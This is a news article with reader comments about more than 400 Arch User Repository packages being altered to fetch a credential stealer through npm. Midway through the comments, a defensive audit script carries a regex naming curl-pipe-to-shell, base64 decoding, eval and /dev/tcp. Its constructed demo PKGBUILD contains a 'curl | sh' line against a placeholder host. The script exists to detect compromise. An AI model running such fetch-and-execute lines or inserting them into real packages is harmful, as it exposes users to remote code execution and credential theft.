
The Arch Linux AUR had over 400 packages compromised with malware

Last updated: 12 Jun 2026 at 6:55 pm UTC

Update - 18:55 UTC - The Arch Linux team has now put up an official announcement:

We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.

We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed. While this is happening, and while we work to create a more permanent solution, users may see issues with the following:

  • Creating new accounts on the AUR
  • Pushing package updates
  • Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.

Original article below:

Looks like the Arch Linux AUR (Arch User Repository) needs better security and package checks, as malicious users have compromised a lot of packages.

For those who aren't clear on the details: the AUR is a community-driven way of providing extra software for Arch Linux. Anyone can submit a package to it. It is completely separate from the official Arch Linux packages, which were not hit.

There's a thread on the public AUR Mailing List with people reporting packages, where it seems like over 400 packages were hit with the issue. Arch packager Jonathan Grotelüschen mentioned work was ongoing to "reset/delete all malicious commits and ban the accounts".

The packages that were changed were altered to pull in npm (a package manager), which is then used to fetch some sort of keylogger / credential stealer - so it's a really quite shocking security breach to have affected so many different packages.

Hopefully the mess will get sorted fully soon, and the packaging process will see some improvements to prevent this from happening in future. Especially with the rise of AI bots, and how much easier this sort of thing has become thanks to them, it could end up a lot worse in future.

Oh dear.

Article taken from GamingOnLinux.com.
About the author -
I am the owner of GamingOnLinux. After discovering Linux back in the days of Mandrake in 2003, I constantly checked on the progress of Linux until Ubuntu appeared on the scene and it helped me to really love it. You can reach me easily by emailing GamingOnLinux directly. You can follow me personally on Mastodon [External Link].
pb 2 hours ago
Quoting: Turkeysteaks: for anyone who doesn't use an AUR helper, I made this basic little bash script:

#!/usr/bin/env bash
# Usage: ./script.sh <pattern>  - greps every ~/AUR/*/PKGBUILD for <pattern>
for dir in ~/AUR/*/
do
    dir=${dir%/}
    echo "${dir}"
    # read the PKGBUILD in place; no need to cd into each directory
    grep -- "$1" "${dir}/PKGBUILD"
done

if you don't keep your AUR packages in ~/AUR/, you will need to change that in the code.

run it with `./<script-name>.sh <bad-package>`. so for this one, if you do `./script.sh atomic` and any of them print anything, you have been compromised. If none of them do, you're hopefully safe.
Or just:

grep atomic ~/AUR/*/PKGBUILD

for yay users: grep atomic ~/.cache/yay/*/PKGBUILD :-)
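The Arch team's advice above to review PKGBUILD and install script changes, and the grep one-liners in this comment, generalise into a small audit script. This is an added example, not code from the article or from any commenter; it assumes AUR clones live under ~/AUR/<pkg>/ (or a directory passed as the first argument) and builds a constructed sample tree for its dry run.

```shell
#!/usr/bin/env bash
# Added example, not from the article or the comment thread: a triage pass
# over locally cloned AUR packages (assumed under ~/AUR/<pkg>/, or the
# directory passed as $1). It flags PKGBUILD and .install lines that invoke
# npm or pipe downloaded content into a shell, the chain the article
# describes, so a human reads them before makepkg runs. A hit is a reason
# to look, not proof of compromise: legitimate packages use npm too.
# Lines worth a closer read: npm calls, download-and-execute pipes,
# decoding of embedded blobs, eval, and raw /dev/tcp sockets.
SUSPICIOUS_RE='(^|[^[:alnum:]])npm([^[:alnum:]]|$)|(curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]|/dev/tcp/'
# scan_file FILE: print "file:line:text" per hit; exit 0 if any hit, 1 if none.
scan_file() {
    [ -f "$1" ] || return 1
    grep -nHE -- "$SUSPICIOUS_RE" "$1"
}

# flagged_packages DIR: print the name of each package directory under DIR
# whose PKGBUILD or any *.install file has a hit; prints nothing when clean.
flagged_packages() {
    local pkgdir f
    for pkgdir in "$1"/*/; do
        [ -d "$pkgdir" ] || continue
        for f in "$pkgdir"PKGBUILD "$pkgdir"*.install; do
            if scan_file "$f" >/dev/null; then basename "$pkgdir"; break; fi
        done
    done
}

# make_demo_tree: create a constructed (not real) package tree for a dry run
# and print its path; example-bin mimics the pattern from the article.
make_demo_tree() {
    local d; d=$(mktemp -d)
    mkdir -p "$d/example-bin" "$d/clean-pkg"
    cat > "$d/example-bin/PKGBUILD" <<'EOF'
pkgname=example-bin
build() {
  npm install --silent some-helper
  curl -s https://example.invalid/setup | sh
}
EOF
    printf 'pkgname=clean-pkg\nbuild() {\n  make\n}\n' > "$d/clean-pkg/PKGBUILD"
    echo "$d"
}
tree=${1:-$(make_demo_tree)}   # e.g. ./audit.sh ~/AUR for your own clones
for p in $(flagged_packages "$tree"); do
    echo "== $p: read these lines before building =="
    for f in "$tree/$p"/PKGBUILD "$tree/$p"/*.install; do scan_file "$f"; done
done
[ -n "${1:-}" ] || rm -rf "$tree"
```

Pair it with `git -C ~/AUR/<pkg> diff` against the commit you last built, since a regex pass only tells you where to start reading, not that the rest of the file is unchanged.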
Philadelphus 1 hour ago
That's how you know it's The Year of the Linux Desktop – we've reached enough market share to make it worth someone's time trying to go after consumers.

Quoting: Liam Squires-Hand: If they cannot do any checks - that's just a glaring flaw in the entire design of the AUR and so yes - it should be shut. If it's just going to repeatedly be a huge security issue like this, then why should it exist? It's dangerous.

I don't think that would be helpful in the long run. "Why should [the AUR] exist?" is a pertinent question. Presumably it exists because it fills a need. People encounter problems not solved by official packages, code up a solution, and want to share it without going through the hassle of making it an official package (for whatever reason, I can think of several legitimate ones). Other people encounter the same problems and find those proffered solutions. If it wasn't helpful in some capacity, the AUR wouldn't exist. We could shut it down, but doing so will not magically make those problems people have go away; someone would just set up another similar site to fill the vacuum (one not under the purview of the Arch team, this time).

It's like closing one beach for shark sightings. People will just go to another beach in a different jurisdiction, they're not going to stop swimming. If the Arch team keeps the AUR around, they can try to improve its security (which I approve of, for the record); if they close it, they don't have much recourse if the "new AUR" that pops up turns out to be run by malicious actors after lots of people have swapped to it.